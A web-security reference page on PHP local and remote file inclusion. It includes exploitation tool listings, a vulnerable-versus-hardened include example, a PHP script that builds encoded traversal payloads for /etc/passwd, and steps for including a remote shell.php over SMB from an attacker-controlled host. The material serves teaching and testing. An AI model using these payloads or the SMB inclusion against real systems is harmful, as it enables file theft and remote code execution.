File Inclusion
A File Inclusion vulnerability is a class of web application flaw, most common in PHP applications, in which an attacker controls the path handed to a file-inclusion directive such as include, require or their _once variants, usually because the value comes from user input that is not properly validated. Depending on what the attacker can get included, the impact ranges from disclosure of source code and configuration files to arbitrary code execution, data theft and defacement of the site.
Summary
Tools
P0cL4bs/Kadimus (archived on Oct 7, 2020) - Kadimus is a tool to check for and exploit LFI vulnerabilities.
D35m0nd142/LFISuite - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner
kurobeats/fimap - fimap is a small Python tool that can find, prepare, audit, exploit and even Google automatically for local and remote file inclusion bugs in web apps.
lightos/Panoptic - Panoptic is an open source penetration testing tool that automates the process of search and retrieval of content for common log and config files through path traversal vulnerabilities.
hansmach1ne/LFImap - Local File Inclusion discovery and exploitation tool
Local File Inclusion
A File Inclusion vulnerability should be distinguished from Path Traversal. Path Traversal lets an attacker read a file the application did not intend to expose, usually by abusing a "reading" mechanism (a download or display function) in the target application, whereas File Inclusion hands the file to the interpreter: its contents are parsed and executed as code. Any file whose content the attacker can influence (a log line, session data, an uploaded file) therefore becomes a route to remote code execution, which is why the two are triaged very differently.
Consider a PHP script that includes a file based on user input. If proper sanitization is not in place, an attacker could manipulate the page parameter to include local or remote files, leading to unauthorized access or code execution.
In the examples below we include the /etc/passwd file; check the Directory & Path Traversal chapter for more interesting files to target.
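The pattern described above, shown as an added example rather than code from the original page: the vulnerable include first, then two hardened alternatives. The parameter name page, the pages/ directory and the page keys are assumptions made for illustration; run it with the PHP built-in server (php -S 127.0.0.1:8080) from a directory that contains a pages/ folder.

```php
<?php
// Added example, not code from the original page: the vulnerable pattern the
// text describes, followed by two hardened alternatives. The parameter name
// "page", the pages/ directory and the page keys are assumptions made for
// illustration; nothing here is taken from a real application.

// --- Vulnerable: the request decides which file the interpreter executes ---
//   ?page=../../../../etc/passwd   -> the file is read and its contents echoed
//   ?page=../../../../var/log/apache2/access.log
//                                  -> log lines containing <?php ... ?> are executed
function vulnerable_include(string $page): void
{
    include $page;   // any readable path, local or (with allow_url_include=On) remote
}

// Applications that append a suffix are no safer; this is exactly the shape that
// the null-byte and path-truncation tricks were designed to defeat.
function vulnerable_include_with_suffix(string $page): void
{
    include 'pages/' . $page . '.php';   // ?page=../../etc/passwd%00 on legacy PHP
}

// --- Hardened 1: exact-match allowlist, the path is never built from input ---
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function safe_include(string $page): bool
{
    // No decoding, no normalisation: "../", "%00" or "%c0%ae" can never equal a key.
    if (!array_key_exists($page, PAGES)) {
        http_response_code(404);
        return false;
    }
    include PAGES[$page];
    return true;
}

// --- Hardened 2: when the set of pages is dynamic, resolve first, then check containment ---
function include_under(string $baseDir, string $page): bool
{
    $base = realpath($baseDir);
    // basename() drops any directory part; realpath() resolves "..", symlinks and
    // returns false for paths that do not exist, so the check below sees the real path.
    $path = realpath($baseDir . '/' . basename($page) . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        http_response_code(404);
        return false;
    }
    include $path;
    return true;
}

safe_include($_GET['page'] ?? 'home');
```

The allowlist variant is the one to prefer: it removes the path from the request entirely, so none of the encoding bypasses that follow have anything to act on. The realpath() variant is the fallback when pages really are dynamic; note that it rejects a path that does not exist rather than trying to sanitise it.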
Null Byte
⚠️ In versions of PHP below 5.3.4 a path can be terminated with a null byte (%00): the path was handed to C string functions that stop at the first NUL, so whatever the application appends after the user-controlled value (typically an extension such as .php) is discarded. PHP 5.3.4 and later reject paths that contain a null byte, so this only works against legacy installations.
Example: Joomla! Component Web TV 1.0 - CVE-2010-1470
Double Encoding
Encode the traversal sequence twice (%252e%252e%252f). A filter or WAF that decodes the parameter once sees %2e%2e%2f, which contains no ../, and the second decode performed later by the application or a proxy restores ../ before the path is opened.
UTF-8 Encoding
Overlong UTF-8 sequences such as %c0%ae for . and %c0%af for / are invalid encodings, but lenient decoders normalise them to the ASCII characters after a byte-level filter has already looked for ../ and found nothing.
Path Truncation
On legacy PHP installations a filename longer than MAXPATHLEN (4096 bytes on Linux) is silently cut off at that limit. Padding the path with a long run of /. or . segments pushes any suffix the application appends (for example .php) past the limit, where it is discarded, while PHP's own path normalisation strips the padding before the file is opened, leaving the intended file. Like the null byte, this is no longer possible on current PHP versions.
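The four bypasses above (null byte, double encoding, overlong UTF-8 and path truncation) generated as concrete payloads, as an added example that is not part of the original page. The host example.com, the parameter name page and the assumption that the target appends .php to the value are illustrative; the script only builds and prints the strings, it sends nothing.

```php
<?php
// Added example, not code from the original page: builds the encoded variants of a
// traversal payload for the four bypasses described above so the exact bytes can be
// inspected before they go into a request. The host example.com, the parameter name
// "page" and the assumption that the application appends ".php" to the value are
// illustrative. Requires PHP 7.4+ (arrow functions).
declare(strict_types=1);

const TARGET = 'http://example.com/index.php?page=';

// "../" repeated enough times to reach "/" from any plausible document root;
// extra "../" at the root are harmless on Linux.
function traversal(string $file, int $depth = 6): string
{
    return str_repeat('../', $depth) . ltrim($file, '/');
}

// Percent-encode every non-alphanumeric byte, including "." which rawurlencode()
// would leave alone, so the output matches the %2e%2e%2f form filters are tested against.
function percent_encode(string $s): string
{
    return implode('', array_map(
        static fn(string $c): string => preg_match('/[A-Za-z0-9]/', $c) ? $c : sprintf('%%%02x', ord($c)),
        str_split($s)
    ));
}

// 1. Null byte (PHP < 5.3.4): the path reached C string functions that stop at NUL,
//    so the ".php" the application appends after %00 was dropped.
function null_byte(string $path): string
{
    return $path . '%00';
}

// 2. Double encoding: a filter that decodes once sees "%2e%2e%2f" (no "../"); the
//    second decode, done later by the application or a proxy, restores "../".
function double_encode(string $path): string
{
    return str_replace('%', '%25', percent_encode($path));
}

// 3. Overlong UTF-8: "." and "/" as the invalid two-byte sequences %c0%ae and %c0%af.
//    A byte-level filter looking for "../" sees nothing; a lenient decoder normalises
//    them back to the ASCII characters before the path is used.
function overlong_utf8(string $path): string
{
    return strtr($path, ['.' => '%c0%ae', '/' => '%c0%af']);
}

// 4. Path truncation (legacy PHP, MAXPATHLEN 4096 on Linux): pad with "/." until the
//    path exceeds the limit so the appended ".php" falls past it and is cut off, while
//    PHP's path normalisation strips the "/." segments before opening the file.
function truncate_pad(string $path, int $limit = 4096): string
{
    $repeats = intdiv($limit - strlen($path), 2) + 1;   // enough to exceed $limit
    return $path . str_repeat('/.', $repeats);
}

function build_all(string $file): array
{
    $path = traversal($file);
    return [
        'plain'      => TARGET . $path,
        'null_byte'  => TARGET . null_byte($path),
        'double'     => TARGET . double_encode($path),
        'utf8'       => TARGET . overlong_utf8($path),
        'truncation' => TARGET . truncate_pad($path),
    ];
}

foreach (build_all('/etc/passwd') as $name => $url) {
    // The truncation payload is over 4 KB; show a prefix and its length instead of the whole string.
    $shown = strlen($url) > 120 ? substr($url, 0, 100) . '... (' . strlen($url) . ' bytes)' : $url;
    printf("%-10s %s\n", $name, $shown);
}
```

Each variant only matters when the application treats the parameter in the way the comment describes (appends a suffix, decodes twice, accepts overlong sequences), so confirm which transformation the target performs before spending requests on all of them.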
Filter Bypass
If the application strips ../ once (a single replacement of ../ with an empty string), a nested sequence such as ....// survives: removing the inner ../ leaves ../ behind. Filters that only look for the literal ../ string are likewise defeated by the encoded forms above or by backslashes on Windows targets.
Remote File Inclusion
Remote File Inclusion (RFI) is a type of vulnerability that occurs when an application includes a remote file, usually through user input, without properly validating or sanitizing the input.
Remote File Inclusion no longer works on a default installation: the allow_url_include directive, introduced in PHP 5.2.0, defaults to Off, so include and require refuse http://, ftp:// and similar URL wrappers even when allow_url_fopen (which governs fopen and file_get_contents and still defaults to On) is enabled. The directive has been deprecated since PHP 7.4. RFI therefore needs a server that was explicitly configured with allow_url_include=On, or a bypass such as the SMB path described below.
Most of the filter bypasses from the LFI section can be reused for RFI.
Null Byte
Append %00 to the remote URL so that a suffix appended by the application is dropped; the same PHP version limit as for LFI applies.
Double Encoding
Double-encode the scheme and path separators (http:%252f%252f...) when the application decodes the parameter twice or a filter only checks for http:// before the first decode.
Bypass allow_url_include
Even with allow_url_include and allow_url_fopen both set to Off, a PHP application running on Windows can still be made to include a remote file over SMB. A UNC path (\\host\share\file) is opened by the Windows filesystem API rather than by PHP's URL wrappers, so the allow_url_* settings are never consulted and the file is read and executed like any local include.
Create a share that is readable by everyone (anonymous or guest access) on a host the target can reach over TCP port 445.
Write the PHP payload into a file on that share, for example shell.php.
Include it through the vulnerable parameter:
http://example.com/index.php?page=\\10.0.0.1\share\shell.php
This requires outbound SMB from the web server to the attacker-controlled host; egress filtering of port 445 is the usual reason it fails.
Labs
References